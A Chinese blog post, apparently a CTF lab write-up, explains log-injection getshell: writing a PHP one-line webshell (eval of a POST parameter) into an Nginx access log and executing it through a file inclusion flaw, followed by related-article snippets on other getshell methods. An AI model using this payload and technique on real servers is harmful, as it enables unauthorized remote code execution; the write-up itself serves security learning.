【网络安全】日志注入getshell

已于 2024-05-25 10:02:46 修改
阅读量2.3k 收藏 24
点赞数 22
分类专栏: 网络安全 文章标签: web安全 日志注入
于 2023-12-26 20:52:54 首次发布
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/135231114
版权

日志文件可能被注入导致任意代码执行甚至getshell等。

文章目录

日志注入getshell

中间件的日志文件通常用于保存网站的访问记录,其中包括了客户端发送的HTTP请求行、User-Agent、Referer等信息。这些日志文件对于网站的运维和安全分析非常有用。

如果能够在HTTP请求中插入恶意代码,那么这些恶意代码就会被保存到日志文件中。当访问日志文件时,其中的恶意代码可能会被执行。

实战

环境如下:
在这里插入图片描述
页面提示存在文件包含漏洞

在这里插入图片描述
服务器为Nginx,尝试访问日志文件:

在这里插入图片描述
访问成功,所以此时可以抓包添加一句话木马、连接蚁剑

<?php @eval($_POST[ice]);?>

在这里插入图片描述

http://297a37a5-d6a8-4f2c-8f53-960416721f6b.challenge.ctf.show/?url=/var/log/nginx/access.log
密码ice

在这里插入图片描述
在这里插入图片描述

在真实的环境中可进行更进一步的操作。

秋说
关注
  • 22
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 13
    评论
专栏目录
【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
cc
02-24 3627
如果网站存在远程文件包含漏洞,攻击者在服务器2号上写一个一句话木马文件,利用网站远程文件包含该文件,并不能Get网站Shell。由于没有存在文件上传点,而我们又需要服务器本地有个文件存在一句话木马代码,这时候我们想到,日志文件记录报错的方法,就是从日志文件中“写入”一句话木马,然后再利用文件包含来执行日志文件中的一句话木马。在该网站根目录下,新建文件FileInclusion,在此文件夹中新建文件include.php,文件内容为。我们可以利用文件包含漏洞读取任意文件,读取文件的时候有利用条件。
利用文件包含漏洞-getshell
LJH1999ZN的博客
02-22 7299
一、什么是文件包含漏洞 文件包含是指应用程序没有对引用的文件做合理的校验,导致包含的文件中含有恶意的代码,并且执行了该代码。从而产生了文件包含漏洞 二、文件包含漏洞的利用条件 1.引用一个任意类型的文件 2.程序读取文件并且执行 三、将木马程序放入某个本地文件中。 1.利用网站报错日志写入木马程序 2.利用文件上传功能,上传含有木马的任意文件 四、文件包含getshell 1.本地文件包含getshell 网站会将一些错误信息记录到日志文件中,我们可以利用这个特性将木马写入日志文件中去
网络安全 文件包含漏洞】日志注入getshell_文件包含漏洞 getshell
最新发布
2401_84969310的博客
05-13 351
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
文件包含漏洞结合ssh登录日志getshell
weixin_54813510的博客
06-26 589
文件包含(漏洞)是程序开发人员通常出于灵活性的考虑,会将被包含的文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞。文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞。php中文件包含的函数有:require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。include(),找不到被包含的文件时只会产生警告,脚本将继续运行。include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。
【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3510
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
文件包含漏洞
Williamanddog的博客
01-29 220
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需 再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包 含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意 文件,造成文件包含漏洞。 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件, 导致意外的文件泄露甚至恶意的代码注入。 。
PHP文件包含漏洞代码分析-通过漏洞getshell-学习笔记
ZhangAweio的博客
04-06 702
假设我们有一个网站有上传漏洞,但我们并不能进行直接getshell,这时候我们就用到这漏洞来进行getshell假如我们有个网站已经成功上传shell 了,但是无法运行,因为是其他格式的那么我们可以通过文件包含漏洞来进行getshell首先写入一句话木马成功访问不是PHP结尾的文件,文件包含漏洞危害及其大,如有被利用不堪设想。
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
4. **教育员工**:提高员工对网络安全的意识,防止社会工程学攻击。 总的来说,理解和防范ThinkPHP v5.x的命令执行漏洞是确保网站和服务器安全的重要环节。无论是开发人员还是管理员,都需要对这种威胁保持警惕,并...
天羽全自动getshell工具VIP版.zip
09-25
网络安全领域,"getshell"通常指的是在目标系统上获得一个命令执行的接口,这在合法的渗透测试中是评估系统安全性的关键步骤。VIP版意味着该工具可能包含更多高级功能和优化,以提高效率和成功率。 在网络安全的...
「安全防护」我的一键 getshell 代码开发之路 - 攻防靶场.zip
11-27
网络安全领域,getshell 是一个常见且重要的概念,特别是在web安全、移动安全以及开发安全的讨论中。Getshell 指的是攻击者通过利用网站或应用程序的漏洞,成功获取到服务器的命令执行权限,能够控制目标系统,...
thinkphp5.X-Batch-getshell-master.rar
03-31
网络安全领域,尤其是Web应用安全方面,"getshell"一词通常意味着攻击者成功获得了服务器的命令执行权限,能够执行任意系统命令,对服务器造成严重威胁。针对ThinkPHP5.x框架的getshell漏洞,本文将详细探讨其原理...
dede批量Getshell
10-31
DEDECMS是一款广泛使用的PHP CMS,而Getshell则是网络安全领域中指利用漏洞在目标服务器上植入后门或者获取服务器控制权的行为。 在描述中,“自己保存为xx.php”,这可能是提醒用户将提供的代码保存为PHP文件,...
通过写入日志phpmyadmin getshell
m0_60894143的博客
04-14 135
general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。select @@basedir可以看到mysql所在的绝对路径。由图可知general_log默认关闭,以及日志的存储路径。general log file 指的是日志的保存路径。这里可以通过phpinfo.php文件查看网站路径。之后就可以上传mimikatz获取密码。常规思路应该是运用工具进行爆破。php版本5.4.45。默认账号密码都是root。进入phpmyadmin。getshell成功。
文件包含漏洞 执行之包含日志文件getshell
2301_80361487的博客
01-23 343
知道日志的物理存放路径、存在文件包含漏洞、使用burp发送请求,或者curl工具(网页请求会对特殊字符编码)
文件包含漏洞包含日志文件获取Shell实战
永远是少年
12-14 939
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞包含日志文件获取Shell实战。 一、文件包含漏洞包含日志文件获取Shell简介 二、文件包含漏洞包含日志文件获取Shell实战
[实践总结] 解决日志注入问题的一次实践(log4j2)
张紫娃的博客
04-05 2309
代码验证:发现日志注入 代码验证:\n\r被替换为_,日志不会被注入 优劣: 优:确实会避免日志注入 劣:代码冗余+代码泛滥 代码验证:enc 会对 CRLF 进行转义,从而避免日志注入 优劣: 优:确实会避免日志注入,而且通过修改配置,避免了代码冗余和代码泛滥 劣:日志文件里依旧会有,如果我们的日志需要被日志可视化服务读取,他们可能会被我们日志注入,这种直观看来感觉就是我们写入日志出问题。主体思路:替换操作语法格式:CRLF转义后的枚举值列举: 代码验证:CRLF 被置换为空 优劣: 优:避免
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2268
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
文件包含漏洞-日志注入
superman66697的博客
08-16 1191
文件包含漏洞是 Web 应用程序中的一种常见漏洞。当应用程序允许用户控制包含在页面上的文件时,攻击者就可以利用这一点来包含恶意文件。这种恶意文件可能包含执行恶意代码,导致各种攻击,如代码执行、数据泄露或其他未授权的行为。日志注入是通过插入恶意数据到应用程序的日志文件来实施的攻击。当这些日志被其他系统或应用程序读取和解析时,攻击者的恶意数据可能会被执行。这通常利用了不安全的日志处理机制和文件包含漏洞的组合。
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5158
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
sql注入getshell
09-09
SQL注入攻击是一种通过构造恶意的SQL语句来破坏数据库安全的技术。通过注入恶意的SQL代码,攻击者可以获取敏感信息,甚至可以在目标系统上执行任意命令,从而获得对系统的完全控制。通过getshell技术,攻击者可以在没有合法帐户的情况下,对目标系统进行远程控制。因此,避免SQL注入攻击和保护系统安全是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值